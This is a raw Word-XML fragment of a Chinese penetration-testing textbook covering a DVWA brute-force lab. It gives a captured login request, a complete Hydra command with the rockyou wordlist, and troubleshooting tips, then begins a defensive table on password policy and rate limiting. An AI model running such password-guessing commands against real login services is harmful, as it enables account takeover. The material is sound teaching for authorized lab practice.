        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">界面左侧选择“Brute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Force”入口，此时浏览器将展示一个常规的用户名+密码登陆框。为观察</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包结构，先行用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）拦截一次失败的登录请求：在表单中输入任意用户名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TEST_USER&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与任意密码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;TEST_PASS&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②，BP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将捕获请求如下（示意结构</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /vulnerabilities/brute/ HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: &lt;DVWA_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie: PHPSESSID=&lt;SESSION_TOKEN&gt;; security=low</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username=&lt;TEST_USER&gt;&amp;password=&lt;TEST_PASS&gt;&amp;Login=Login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应中，若登录失败，页面</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"Username and/or password incorrect."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这样一段标志性文字（DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">难度的固定失败提示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">② Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令（授权环境）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打开攻击机终端（Kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或其他有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的发行版</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②），执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/rockyou.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> http-post-form </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/vulnerabilities/brute/:username=^USER^&amp;password=^PASS^&amp;Login=Login:Username and/or password incorrect."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认的低权限用户名（实际目标可能因配置而异</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字典路径若有差异，可用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">locate rockyou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name "rockyou.txt" 2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查找（路径因发行版版本而异</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">失败标记字符串务必与靶机响应严格一致，否则</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会把成功的登录也当作失败尝试（或相反），造成大量假阳性/假阴性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">③ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DVWA_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可通达且</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Brute Force low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">难度没有额外防护，Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会逐步输出尝试的行（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">host: &lt;DVWA_IP&gt; login: admin password: 123456</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是成功匹配时的典型结果</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">应特别留意：Hydra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">输出的实际密码因字典及靶机环境而异，此处的“123456”仅为常见的演示示例，并非精确预言。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如果口令不在字典中，Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会遍历完指定字典后退出，输出“0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> valid passwords found”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">④ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见错误与排错（环境相关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">②）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">连接被拒绝/超时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;DVWA_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否可达（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务是否已启动（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -v http://&lt;DVWA_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），且攻击机与靶机是否处于同一可达的隔离虚拟网络中。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">始终匹配不到正确口令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：确认浏览器能正常以目标口令登录；然后用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">截获登录包，逐字确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的表单字段名是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（实际应用可能是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等——Hydra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">^USER^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">^PASS^</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">占位符需要匹配准确的字段名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）。同时绝对确认失败标记字符串为响应中的静态唯一文本——若靶机使用统一重定向而非文本提示，标记式判决将失效，此时需改用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">S=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应码判定或切换到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Intruder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于响应包长度的差异化分析。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">会话维持问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：某些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用要求在爆破时携带有效</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CSRF Token。Hydra </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">支持用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">H=Cookie\: value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">添加头，但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Token </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每次刷新则需引入额外机制，超出在线爆破简单范畴（可移至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Intruder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或宏处理）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="195"/>
    <w:bookmarkStart w:id="196" w:name="防御对照框口令策略与在线防护"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：口令策略与在线防护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防御措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">强制强口令策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">注册时检测弱口令（通过黑名单或基于</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> zxcvbn </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">等熵估计库），要求最小长度、字符集复杂度，并禁止与用户名、邮箱等个人信息雷同。口令强度反馈机制在</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Weidman </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">的渗透测试教材中也作为管理类控制被强调。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">速率限制（Rate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Limiting）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">基于</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
